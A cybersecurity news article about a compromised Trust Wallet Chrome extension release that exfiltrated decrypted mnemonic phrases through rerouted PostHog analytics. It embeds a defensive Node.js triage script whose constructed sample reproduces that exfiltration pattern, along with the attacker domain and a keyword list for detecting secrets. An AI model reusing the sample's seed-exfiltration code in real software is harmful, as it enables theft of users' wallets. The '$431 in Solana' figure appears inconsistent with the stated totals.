Malicious Code in Trust Wallet Chrome Extension Caused $7 Million Crypto Loss


“A Chrome Extension Breach in Trust Wallet Caused $7 Million Crypto Loss through malicious code.”

After what it called a “security incident” that resulted in the loss of about $7 million, Trust Wallet is advising customers to update their Google Chrome extension to the most recent version.

The multi-chain, non-custodial cryptocurrency wallet provider stated that version 2.68 of the extension is the affected release.

According to its Chrome Web Store listing, the extension has roughly a million users. Users are advised to update to version 2.69 as soon as possible.

Trust Wallet said in a post on X:

“We will make sure that all impacted users receive a refund. We have verified that about $7 million has been impacted.”

“Our primary goal is to assist impacted users, and we are aggressively completing the procedure to reimburse them.”

Trust Wallet is also advising users not to respond to any messages that do not originate from its official channels. All other versions of the browser extension are unaffected, as are users who only use the mobile apps.


Blockchain security firm SlowMist's analysis found that version 2.68 contained malicious code designed to iterate through every wallet stored in the extension and request the mnemonic phrase for each one.

“The password or passkeyPassword entered during wallet unlock is then used to decipher the encrypted mnemonic.”

“The attacker’s service, api.metrics-trustwallet[.]com, receives the mnemonic phrase after it has been decrypted.”

“Instead of an inserted compromised third-party dependency (such as a malicious npm package), this backdoor event resulted from malicious source code alteration within the internal Trust Wallet extension codebase (analytics logic).”

“After directly altering the application’s code, the attacker used the authentic PostHog analytics package as a data-exfiltration channel, rerouting analytic traffic to a server under their control.”

The attack may be the work of a nation-state actor. The attackers may have obtained deployment permissions before December 8, 2025, or compromised developer devices tied to Trust Wallet.

The domain metrics-trustwallet[.]com was registered on December 8, 2025, and the first requests to api.metrics-trustwallet[.]com were observed on December 21, 2025.

Subsequent investigation has shown that the attacker harvested wallet user data through posthog-js, the open-source JavaScript SDK of the PostHog product-analytics platform.
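SlowMist's description above comes down to two things a reviewer of a wallet-extension build can look for without running it: the analytics SDK pointed at a host it should not be talking to, and secret material (mnemonics, seeds, unlock passwords) flowing into an analytics event. The Node.js script below is an added example, not code from Trust Wallet, SlowMist or PostHog; it runs those checks over constructed sample bundles. The allowlist of PostHog ingestion hosts, the hypothetical `decryptMnemonic` wallet method and the sample sources are assumptions made for this example; the only real indicator in it is the attacker domain reported above, written without the defanging brackets so that string matching works.

```javascript
// Added example (not code from Trust Wallet, SlowMist or PostHog): static triage
// of an unpacked browser-extension bundle for the two indicators described in
// SlowMist's analysis:
//   1. analytics traffic re-pointed at a host outside the expected analytics hosts
//      (or at the attacker domain SlowMist reported), and
//   2. secret material (mnemonic, seed, unlock password) passed into an analytics
//      capture call.
// The sample bundles near the bottom are constructed for this example; the only
// real indicator they contain is the reported attacker domain.

// Attacker domain from SlowMist's report (undefanged so string matching works).
const KNOWN_BAD_HOSTS = ['metrics-trustwallet.com'];

// Assumption: the hosts a legitimate posthog-js build would talk to. Adjust to
// whatever your own build configuration actually uses.
const ALLOWED_ANALYTICS_HOSTS = new Set([
  'app.posthog.com',
  'us.i.posthog.com',
  'eu.i.posthog.com',
]);

// Property names that should never appear in an analytics event payload (lower-case).
const SECRET_KEYWORDS = ['mnemonic', 'seed', 'passkeypassword', 'privatekey'];

// Every host referenced by an http(s) URL in the source, lower-cased and de-duplicated.
function extractAllHosts(source) {
  const re = /https?:\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;
  const hosts = new Set();
  let m;
  while ((m = re.exec(source)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Hosts assigned to posthog-js's `api_host` option, e.g. posthog.init(key, { api_host: '...' }).
function extractApiHosts(source) {
  const re = /api_host\s*[:=]\s*['"`]https?:\/\/([^/'"`\s]+)/gi;
  const hosts = [];
  let m;
  while ((m = re.exec(source)) !== null) hosts.push(m[1].toLowerCase());
  return hosts;
}

// Argument text of every `.capture(` call, found with a simple balanced-paren
// scanner (good enough for triage; not a full JavaScript parser).
function findCaptureCalls(source) {
  const calls = [];
  let idx = 0;
  while ((idx = source.indexOf('.capture(', idx)) !== -1) {
    const open = idx + '.capture'.length; // index of the '('
    let depth = 0;
    let i = open;
    for (; i < source.length; i++) {
      if (source[i] === '(') depth++;
      else if (source[i] === ')' && --depth === 0) break;
    }
    calls.push(source.slice(open + 1, i));
    idx = i;
  }
  return calls;
}

// True for the reported attacker domain and any subdomain of it.
function isKnownBad(host) {
  return KNOWN_BAD_HOSTS.some((bad) => host === bad || host.endsWith('.' + bad));
}

// Run all three checks over one source file and return a list of findings.
function triageBundle(fileName, source) {
  const findings = [];
  for (const host of extractAllHosts(source)) {
    if (isKnownBad(host)) findings.push({ file: fileName, rule: 'known-bad-host', detail: host });
  }
  for (const host of extractApiHosts(source)) {
    if (!ALLOWED_ANALYTICS_HOSTS.has(host)) {
      findings.push({ file: fileName, rule: 'analytics-host-not-allowlisted', detail: host });
    }
  }
  for (const args of findCaptureCalls(source)) {
    const hit = SECRET_KEYWORDS.find((k) => args.toLowerCase().includes(k));
    if (hit) findings.push({ file: fileName, rule: 'secret-in-analytics-event', detail: `${hit}: capture(${args.trim()})` });
  }
  return findings;
}

// files: { 'path/in/bundle.js': sourceText, ... } (read them from the unpacked extension in practice)
function triageExtension(files) {
  return Object.entries(files).flatMap(([name, src]) => triageBundle(name, src));
}

// ---- constructed samples (not real Trust Wallet code) ----
const SAMPLE_CLEAN = `
import posthog from 'posthog-js';
posthog.init('phc_example', { api_host: 'https://us.i.posthog.com' });
export function trackOpen(chain) { posthog.capture('wallet_opened', { chain }); }
`;

// A sketch of the pattern SlowMist described: walk every stored wallet, decrypt its
// mnemonic with the unlock password, and push it out through the analytics SDK.
const SAMPLE_SUSPECT = `
import posthog from 'posthog-js';
posthog.init('phc_example', { api_host: 'https://api.metrics-trustwallet.com' });
export async function onUnlock(wallets, password) {
  for (const w of wallets) {
    const mnemonic = await w.decryptMnemonic(password); // hypothetical wallet API
    posthog.capture('metrics', { id: w.id, mnemonic });
  }
}
`;

console.log(JSON.stringify(triageExtension({ 'clean.js': SAMPLE_CLEAN, 'suspect.js': SAMPLE_SUSPECT }), null, 2));
```

The clean sample produces no findings; the suspect sample trips all three rules. In practice you would feed `triageExtension` the JavaScript files of the unpacked extension (Chrome keeps installed extensions under the profile's Extensions directory) and treat any `known-bad-host` hit as confirmation of the compromised 2.68 build, while the other two rules are heuristics worth a manual look.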

The digital assets drained so far include approximately $3 million in Bitcoin, $431 in Solana, and more than $3 million in Ethereum. The stolen funds have been moved and laundered through cross-chain bridges and centralized exchanges.

ZachXBT, a blockchain investigator, published an update stating that hundreds of people have been affected by the incident.


Blockchain security firm PeckShield reported:

“The majority of the stolen funds (more than $4 million in cryptocurrency) have been transferred to CEXs [centralized exchanges]: ~$3.3 million to ChangeNOW, ~$340,000 to FixedFloat, and ~$447,000 to KuCoin. However, ~$2.8 million of the funds are still in the hacker’s wallets (Bitcoin, EVM, and Solana).”

Changpeng Zhao, co-founder of the cryptocurrency exchange Binance, which owns Trust Wallet, suggested that the exploit was “most likely” carried out by an insider, although no additional evidence was offered to support that theory.

About The Author

Suraj Koli is a content specialist in technical writing about cybersecurity and information security.
